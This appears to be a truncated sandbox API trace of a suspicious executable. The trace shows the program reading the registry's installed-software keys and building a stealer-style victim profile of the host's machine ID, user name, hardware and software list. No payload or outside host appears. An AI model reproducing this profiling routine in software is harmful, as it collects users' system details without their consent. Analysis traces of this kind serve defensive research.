Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n" [0175.947] RegCloseKey (hKey=0x354) returned 0x0 [0175.947] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x39, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.947] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}") returned 90 [0175.947] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.947] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpcbData=0x197fd4*=0x3c) returned 0x0 [0175.947] lstrlenA (lpString="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219") returned 59 [0175.947] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n", lpString2="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219" [0175.947] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="10.0.40219", lpcbData=0x197fd4*=0xb) returned 0x0 [0175.953] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 " [0175.953] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 